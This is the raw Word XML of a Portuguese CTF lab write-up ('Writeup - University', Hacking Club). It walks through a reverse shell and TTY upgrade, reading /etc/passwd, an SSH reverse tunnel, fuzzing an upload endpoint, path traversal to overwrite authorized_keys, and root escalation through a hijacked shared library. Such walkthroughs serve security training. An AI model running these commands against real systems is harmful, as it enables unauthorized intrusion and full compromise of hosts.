          <w:bCs w:val="1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Após a execução do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shell.sh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foi estabelecida uma shell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TTY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interativa na porta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443.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AA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script /dev/null -c bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AB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ctr+z</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AC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stty raw -echo;fg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AD">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="37474f"/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714500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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45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Foi identificado o usuário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service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na máquina alvo. Além disso, foi observado um serviço em execução localmente na porta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8080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indicando a presença de uma aplicação acessível apenas internamente no host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B2">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="37474f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="2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cat /etc/passwd | grep bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B4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ps aux | grep service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B5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ss -anlpt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B6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curl localhost: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8080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/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B7">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto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color w:val="37474f"/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1485900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="17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859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Como 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SSH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já estava configurado na máquina do atacante, foi possível realizar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port forwarding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 Dessa forma, a máquina alvo estabeleceu a conexão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SSH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e criou um túnel que encaminhou a porta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8080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da máquina host para a porta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8081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na máquina local.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BC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ssh -R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8081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127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8080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&lt;YOUR-USER&gt;@&lt;VPN-IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BF">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="37474f"/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2743200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="18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32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240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/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Na máquina do atacante, a porta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8081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foi aberta, indicando que o tunelamento foi estabelecido com sucesso.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ss -anlpt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C5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color w:val="37474f"/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1244600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="19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46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1270000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="20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00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Por meio de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fuzzing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foi possível identificar um endpoint de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upload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na aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CB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0" w:lineRule="auto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ffuf -X POST -u http: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//localhost:8081/FUZZ -w quickhits.txt -t 10 --mc all -c -fc 404</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CD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color w:val="37474f"/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2806700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="21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67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Por meio desse endpoint, foi possível realizar o upload de um arquivo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D1">
      <w:pPr>
        <w:spacing w:after="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0" w:lineRule="auto"/>
        <w:jc w:val="both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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="37474f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="2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curl -X POST http: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//localhost:8081/upload \</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D3">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both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-F "file=@upload.txt;filename=upload.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D4">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both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"message"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"Document uploaded successfully"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"document"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:{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"filename"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"upload.txt"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"size"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6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"createdAt"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"2026-03-07T19:04:57.269Z"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"modifiedAt"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"2026-03-07T19:05:24.924Z"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}}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D5">
      <w:pPr>
        <w:spacing w:after="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color w:val="37474f"/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685800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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58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Nesse mesmo endpoint de upload, foi possível explorar um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Path Traversal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permitindo voltar diretórios no sistema de arquivos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DA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Com isso, foi possível sobrescrever o arquivo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authorized_keys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do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SSH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e inserir uma chave pública controlada. Dessa forma, tornou-se possível autenticar na máquina via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SSH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utilizando a chave privada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DB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876300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="3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763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ssh -i ~&lt;PRIVATE-KEY&gt; service@&lt;MACHINE-IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E0">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="37474f"/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2476500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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65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1092200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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922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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1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flag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se encontra no diretório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/home/service.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E7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863600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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636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Style w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.n9bv2s4b1by8" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Escalação de privilégio - obtendo a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root flag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Com o comando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sudo -l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foi possível verificar quais binários o usuário pode executar como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root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sem a necessidade de senha. A saída indicou que o usuário pode executar o binário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backup_manager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como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root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C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sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EE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color w:val="37474f"/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711200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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12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Com o uso do binário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strace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foi possível identificar os caminhos das bibliotecas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.so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utilizadas pelo binário durante sua execução. Foram identificadas algumas bibliotecas utilizadas pelo binário, entre elas a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libc.so.6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F2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0" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="c5221f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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strace -e openat /usr/local/bin/backup_manager /tmp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&gt;&amp;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</w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F4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color w:val="37474f"/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1308100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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81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Ao listar o diretório onde essa biblioteca deveria estar, foi observado que o arquivo não existia e que havia permissão de escrita nesse local.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F8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ls -alh /usr/local/lib/glibc-hwcaps/x86-64-v2/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FA">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="37474f"/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647700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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5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77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Dessa forma, foi possível criar uma biblioteca maliciosa com o mesmo nome, que seria carregada e executada com privilégios de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root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 Dessa forma, foi possível escalar privilégios administrativos e obter acesso como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root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FF">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto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0" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="c5221f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="37474f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="2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cat exploit.c | head -n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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000101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gcc -shared -fPIC -o exploit.so exploit.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000102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cp exploit.so /usr/local/lib/glibc-hwcaps/x86-64-v2/liblogger.so</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000103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sudo /usr/local/bin/backup_manager /tmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000104">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto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color w:val="37474f"/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1536700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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5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67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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1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 flag de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root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se encontra no diretório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/root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000109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444500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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5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45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sectPr>
      <w:headerReference r:id="rId58" w:type="default"/>
      <w:headerReference r:id="rId59" w:type="first"/>
      <w:headerReference r:id="rId60" w:type="even"/>
      <w:footerReference r:id="rId61" w:type="default"/>
      <w:footerReference r:id="rId62" w:type="first"/>
      <w:footerReference r:id="rId63" w:type="even"/>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
      <w:pgMar w:bottom="1440" w:top="0" w:left="1440" w:right="1440" w:header="0" w:footer="85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IBM Plex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IBM Plex Sans SemiBold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2">
    <w:pPr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240" w:lineRule="auto"/>
      <w:ind w:left="-1276" w:right="289" w:firstLine="1276"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:shd w:fill="9a309b" w:val="clear"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">© 2026 Hacking Club | Todos os direitos reservados </w:t>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">          </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">                          Página </w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f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C">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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0D">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.6vrogorm36q9" w:id="5"/>
    <w:bookmarkEnd w:id="5"/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-866770</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>95250</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="719138" cy="232221"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="26" name="image28.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image28.jpg"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:srcRect b="28627" l="0" r="-7644" t="36271"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="719138" cy="232221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10E"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120" w:before="360" w:lineRule="auto"/>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:color w:val="000000"/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32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0F">
    <w:pPr>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr/>
      <w:pict>
        <v:shape id="WordPictureWatermark1" style="position:absolute;width:617.76pt;height:793.4866141732284pt;rotation:0;z-index:-503316481;mso-position-horizontal-relative:margin;mso-position-horizontal:absolute;margin-left:-73.98425196850394pt;mso-position-vertical-relative:margin;mso-position-vertical:absolute;margin-top:-1.2459055118110236pt;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId2" o:title="image32.png"/>
        </v:shape>
      </w:pic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0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-942970</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>0</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7820025" cy="10085729"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="22" name="image24.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image24.png"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:srcRect b="8816" l="0" r="0" t="0"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="7820025" cy="10085729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mc:AlternateContent>
        <mc:Choice Requires="wpg">
          <w:drawing>
            <wp:anchor allowOverlap="1" behindDoc="0" distB="45720" distT="45720" distL="114300" distR="114300" hidden="0" layoutInCell="1" locked="0" relativeHeight="0" simplePos="0">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>-344480</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5771833</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6686550" cy="3010435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2390550" y="2454150"/>
                        <a:ext cx="5910900" cy="2651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120" w:before="480" w:line="275.9999942779541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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
                              <w:b w:val="0"/>
                              <w:i w:val="1"/>
                              <w:smallCaps w:val="0"/>
                              <w:strike w:val="0"/>
                              <w:color w:val="ffffff"/>
                              <w:sz w:val="48"/>
                              <w:vertAlign w:val="baseline"/>
                            </w:rPr>
                            <w:t xml:space="preserve">Writeup - University</w:t>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx>
                    <wps:bodyPr anchorCtr="0" anchor="ctr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45720" distT="45720" distL="114300" distR="114300" hidden="0" layoutInCell="1" locked="0" relativeHeight="0" simplePos="0">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>-344480</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5771833</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6686550" cy="3010435"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="1" name="image54.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image54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686550" cy="30104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1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spacing w:line="240" w:lineRule="auto"/>
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:pict>
        <v:shape id="WordPictureWatermark2" style="position:absolute;width:617.76pt;height:793.4866141732284pt;rotation:0;z-index:-503316481;mso-position-horizontal-relative:margin;mso-position-horizontal:center;mso-position-vertical-relative:margin;mso-position-vertical:center;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId1" o:title="image32.png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2.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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5.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21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discord.com/channels/705946302105649153/1173705871046475796" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4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BMPlexSans-regular.ttf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-bold.ttf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-italic.ttf"/><Relationship Id="rId4" 